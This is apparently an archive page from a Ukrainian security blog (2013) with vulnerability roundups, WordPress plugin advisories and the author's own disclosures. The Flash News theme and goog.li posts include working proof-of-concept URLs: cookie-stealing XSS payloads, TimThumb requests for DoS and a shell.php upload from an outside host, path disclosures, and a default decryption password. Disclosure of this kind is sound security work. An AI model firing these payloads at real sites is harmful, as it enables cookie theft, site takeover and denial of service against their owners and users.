Архів для категорії 'Уразливості'

Добірка уразливостей

17:27 13.02.2013

В даній добірці уразливості в веб додатках:

  • HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Disclosure of Information (деталі)
  • Kohana Framework v2.3.3 - Directory Traversal Vulnerability (деталі)
  • HP SiteScope SOAP Security Issues, Remote Disclosure of Information, Remote Code Execution (деталі)
  • DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability (деталі)
  • GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities (деталі)
  • XSS in Elgg 1.8.12, 1.7.16 (core module “Twitter widget”) (деталі)
  • GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities (деталі)
  • rails security update (деталі)
  • Hard-coded credentials and command-injection vulnerabilities on BigPond 3G21WB (деталі)
  • nagios3 security update (деталі)

Уразливості в плагінах для WordPress №92

23:51 12.02.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Developer Formatter, Advanced Custom Fields та Valums Uploader. Для котрих з’явилися експлоіти. Developer Formatter - це плагін для форматування тексту вихідних кодів, Advanced Custom Fields - це плагін для додання додаткових полів, Valums Uploader - це плагін для завантаження файлів.

  • Wordpress Developer Formatter CSRF Vulnerability (деталі)
  • WordPress Advanced Custom Fields Remote File Inclusion (деталі)
  • WordPress Valums Uploader Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в WordPress

23:55 11.02.2013

Рік тому, Trustwave’s SpiderLabs опублікували численні уразливості в WordPress (що вони виявили наприкінці 2011 року). Я дещо відклав публікацію цих уразливостей, тому роблю це лише зараз. Вирішив детальніше з ними розібратися, бо з опису вони виглядають такими, що важко експлуатуються. І після повідомлення розробникам WP (та подальшого оприлюднення уразливостей), вони відмовилися їх виправляти саме з цієї причини.

В WordPress були виявлені PHP Code Execution, Cross Site Scripting (persistent і reflected) та Brute Force (логінів і паролів MySQL) уразливості. Причому через останню уразливість можна проводити підбор логінів і паролів MySQL Server як на локальному хості, так і зовнішніх хостах.

Раніше я вже писав про XSS уразливість в swfupload в WordPress.

CE / XSS / BF:

Уразливості наявні в setup-config.php. Особливістю атак на них є невелике “вікно атаки” - ці уразливості використати лише коли не встановлений движок на сайті. Тобто коли файли WP були розміщені на сайті, але движок ще не встигли встановити (зазвичай це дуже невеликий проміжок часу, бо движок інсталюють оперативно, тому нападникам важко буде підібрати вдалий час для проведення атаки).

Також я вважаю, що іншими умовами для проведення цих атак може бути використання відповідних уразливостей в WordPress, про які я писав раніше. Коли видалити файл wp-config.php через Arbitrary File Deletion дірку в WP.

Уразливі WordPress 3.3.1 та попередні версії.

Добірка уразливостей

16:17 11.02.2013

В даній добірці уразливості в веб додатках:

  • DoS/Authorization Bypass in Samsung Kies Air (деталі)
  • Cross-site Scripting in iTop (деталі)
  • libunity-webapps vulnerability (деталі)
  • DigiLIBE Management Console - Execution After Redirect (EAR) Vulnerability (деталі)
  • Insecure default WPA2 passphrase in multiple Belkin wireless routers (деталі)
  • movabletype-opensource security update (деталі)
  • Microsoft Security Bulletin MS12-062 - Important Vulnerability in System Center Configuration Manager Could Allow Elevation of Privilege (2741528) (деталі)
  • ganglia security update (деталі)
  • Lynx vulnerabilities (деталі)
  • nCircle PureCloud Vulnerability Scanner - Multiple Web Vulnerabilities (деталі)

Уразливості в плагінах для WordPress №91

23:56 02.02.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Cardoza, WordPress Uploader та Xerte Online. Для котрих з’явилися експлоіти. Cardoza - це плагін для голосування, WordPress Uploader - це плагін для завантаження файлів (це php-експлоіт для даного плагіна), Xerte Online - це плагін для електронного навчання.

  • Multiple SQL injection vulnerabilities in Cardoza Wordpress poll plugin (деталі)
  • WordPress Uploader 1.0.4 Shell Upload (деталі)
  • WordPress Xerte Online 0.32 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в темі Flash News для WordPress

23:50 01.02.2013

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload та Information Leakage уразливості в темі Flash News для WordPress. А знайшов я уразливоті в цій темі від WooThemes ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні), а цього разу я дослідив й інші дірки в цій темі.

В інших темах від WooThemes аналогічна ситуація (раніше я привів перелік 89 уразливих тем для WP від них).

XSS (WASC-08):

http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/thumb.php?src=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в невиправлених версіях TimThumb):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Information Leakage (WASC-13):

http://site/wp-content/themes/flashnews/includes/test.php

XSS (WASC-08) (в PHP < 4.4.1, 4.4.3-4.4.6):

http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі всі версії теми Flash News для WordPress (в останніх версіях виправлені лише уразливості в thumb.php).

Добірка уразливостей

17:21 01.02.2013

В даній добірці уразливості в веб додатках:

  • Directory Traversal Vulnerability in Sitecom Home Storage Center (деталі)
  • Apache CouchDB JSONP arbitrary code execution with Adobe Flash (деталі)
  • Directory Traversal Vulnerability in Conceptronic GrabnGo Network Storage (деталі)
  • Apache CouchDB DOM based Cross-Site Scripting via Futon UI (деталі)
  • QNAP Turbo NAS Multiple Path Injection (деталі)
  • Apache CouchDB Information disclosure via unescaped backslashes in URLs on Windows (деталі)
  • Multiple cross-site scripting (XSS) vulnerabilities in Transmission (деталі)
  • SQL Injection Vulnerability in ImageCMS (деталі)
  • Microsoft Security Bulletin MS12-061 - Important Vulnerability in Visual Studio Team Foundation Server Could Allow Elevation of Privilege (2719584) (деталі)
  • Cross-Site Scripting (XSS) vulnerability in gpEasy (деталі)

Уразливості в плагінах для WordPress №90

20:11 30.01.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Sahifa, Shopping Cart та ReFlex Gallery. Для котрих з’явилися експлоіти. Sahifa - це тема движка, Shopping Cart - це плагін для створення онлайн-магазину, ReFlex Gallery - це плагін для створення галерей зображень.

  • WordPress Sahifa 2.4.0 Cross Site Request Forgery / Path Disclosure (деталі)
  • WordPress Shopping Cart 8.1.14 Shell Upload / SQL Injection (деталі)
  • WordPress ReFlex Gallery 1.3 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості в WordPress Attack Scanner для WordPress

23:52 29.01.2013

29.10.2012

У жовтні, 07.10.2012, я виявив Information Leakage уразливості в плагіні WordPress Attack Scanner для WordPress. Дірки виявив у версії Free, але версія Pro також повинна бути уразливою. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Wordfence Security.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

29.01.2013

Information Leakage (WASC-13):

http://site/wp-content/plugins/path/data.txt
http://site/wp-content/plugins/path/archive.txt

Папка “path” може бути WP-Attack-Scanner або WP-Attack-Scanner-Free.

Вільний доступ до даних - їх можна прочитати в браузері без авторизації. Хоча дані зашифровані, але по замовчуванню пароль changepassword. Якщо пароль не був змінений, то дані легко розшифровуються, якщо ж змінений, то його можна підібрати.

Уразливі всі версії WordPress Attack Scanner, як безкоштовна, так і платна. Перевірялося на версії 0.9.5.beta.

Уразливість на goog.li

23:58 28.01.2013

16.10.2012

У жовтні, 09.10.2012, я знайшов Cross-Site Scripting уразливість на секюріті сайті https://goog.li. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.01.2013

XSS:

https://goog.li/?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дана уразливість вже виправлена.